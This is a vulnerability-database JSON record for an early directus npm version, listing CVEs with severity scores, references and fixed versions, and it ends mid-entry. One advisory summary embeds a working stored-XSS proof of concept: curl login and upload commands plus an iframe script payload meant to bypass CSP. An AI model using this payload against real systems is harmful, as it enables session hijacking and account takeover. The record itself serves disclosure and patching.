{"url":"http://public2.vulnerablecode.io/api/packages/547999?format=json","purl":"pkg:npm/directus@0.1.0-preview.16","type":"npm","namespace":"","name":"directus","version":"0.1.0-preview.16","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.2.1","latest_non_vulnerable_version":"11.17.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105428?format=json","vulnerability_id":"VCID-32e6-c1bv-efea","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, when using Directus Flows with the WebHook trigger all incoming request details are logged including security sensitive data like access and refresh tokens in cookies. Malicious admins with access to the logs can hijack the user sessions within the token expiration time of them triggering the Flow. Version 11.9.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54588","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0031","scoring_system":"epss","scoring_elements":"0.54713","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scorin
g_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53886"},{"reference_url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb","reference_id":"22be460c76957708d67fdd52846a9ad1cbb083fb","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb"},{"reference_url":"https://github.com/directus/directus/pull/25354","reference_id":"25354","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/pull/25354"},{"reference_url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"GHSA-f24x-rm6g-3w5v","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f24x-rm6g-3w5v"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v","reference_id":"GHSA-f24x-rm6g-3w5v","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-f24x-rm6g-3w5v"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"v11.9.0","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"va
lue":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:41:05Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378353?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53886","GHSA-f24x-rm6g-3w5v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-32e6-c1bv-efea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40734?format=json","vulnerability_id":"VCID-54ja-4vrx-tbgm","summary":"Directus is a real-time API and App dashboard for managing SQL database content. An unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include redirect query string. 
This happens because on that endpoint for both OpenId and Oauth2 Directus is using the respond middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials. This vulnerability is fixed in 10.13.3 and 11.1.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596","reference_id":"","reference_type":"","scores":[{"value":"0.00753","scoring_system":"epss","scoring_elements":"0.73725","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00753","scoring_system":"epss","scoring_elements":"0.7365","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring
_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"769fa22797bff5a9231599883b391e013f122e52","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596","reference_id":"CVE-2024-45596","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/
AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596"},{"reference_url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33327?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/33329?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-3vnr-k31f-vycv"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p
-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-ghbw-eqaz-jqhs"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-45596","GHSA-cff8-x7jv-4fm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-54ja-4vrx-tbgm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360571?format=json","vulnerability_id":"VCID-79ch-vtkp-q3cd","summary":"Directus has a DOM-Based cross-site scripting (XSS) via layout_options\n### Impact\nDirectus allows an authenticated attacker to save cross site scripting code to the database. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. 
When chained with [CVE-2024-6534](https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86), it could result in account takeover.\n\n### PoC\nTo exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.\n\n1. Upload the following JavaScript file.\n\nUsing the upload functionality at `POST /files`. This PoC will show an alert message.\n\n```js\nexport TARGET_HOST=\"http://localhost:8055\"\nexport ATTACKER_EMAIL=\"malicious@malicious.com\"\nexport ATTACKER_PASSWORD=\"123456\"\nroot_dir=$(dirname $0)\nmkdir \"${root_dir}/static\"\n\ncurl -s -k -o /dev/null -w \"%{http_code}\" -X 'POST' \"${TARGET_HOST}/auth/login\" \\\n    -c \"${root_dir}/static/attacker_directus_session_token\" \\\n    -H 'Content-Type: application/json' \\\n    -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\"\n\nid_url_file=$(echo \"alert('Successful DOM-based XSS')\" |\n  curl -s -k -X 'POST' \"${TARGET_HOST}/files\" \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    -F \"file=@-;type=application/x-javascript;filename=poc.js\" | jq -r \".data.id\")\n```\n\n2. Create a preset for a collection and store the preset ID.\n\nOr use a preset already created from GET /presets. 
The following example uses the direct_users preset.\n\n```\nattacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") curl -i -s -k -X 'POST' \"${TARGET_HOST}/presets\" \\ -H 'Content-Type: application/json' \\ -b \"${root_dir}/static/attacker_directus_session_token\" \\ --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"<iframe srcdoc=\\\\\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\\\\\">\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nWhen the user visits the view that uses the directus_users preset, the JavaScript file will be executed.\n\nNotes:\n\nNeed to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. 
The payload structure is `<iframe srcdoc=\\\"<script src='URL_MALICIOUS_FILE'> </script>\\\">`.\n\nWe can target any collection that uses the vulnerable template structure that renders the layout option section.\n\nIn this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw"},{"reference_url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"GHSA-9qrm-48qf-r2rw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377107?format=json","purl":"pkg:npm/directus@11.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-
4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3"}],"aliases":["GHSA-9qrm-48qf-r2rw"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-79ch-vtkp-q3cd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/166718?format=json","vulnerability_id":"VCID-8ch7-zwuu-zufp","summary":"In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are 
true.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76336","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76265","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/12022","reference_id":"12022","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/pull/12022"},{"reference_url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md","reference_id":"config-options.md","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md"},{"reference_url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS","reference_id":"CORS","referenc
e_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969","reference_id":"CVE-2022-26969","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969"},{"reference_url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822","reference_id":"SNYK-JS-DIRECTUS-2441822","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09
Z/"}],"url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"v9.7.0","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/20019?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-9t8b-59vc-kbea"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eb1b-zvas-muey"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnera
bility":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-26969","GHSA-g27j-74fp-xfpr","GMS-2022-677"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8ch7-zwuu-zufp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71947?format=json","vulnerability_id":"VCID-9dsr-kz3s-hkdx","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, when GRAPHQL_INTROSPECTION=false is configured, Directus correctly blocks standard GraphQL introspection queries (__schema, __type). However, the server_specs_graphql resolver on the /graphql/system endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. 
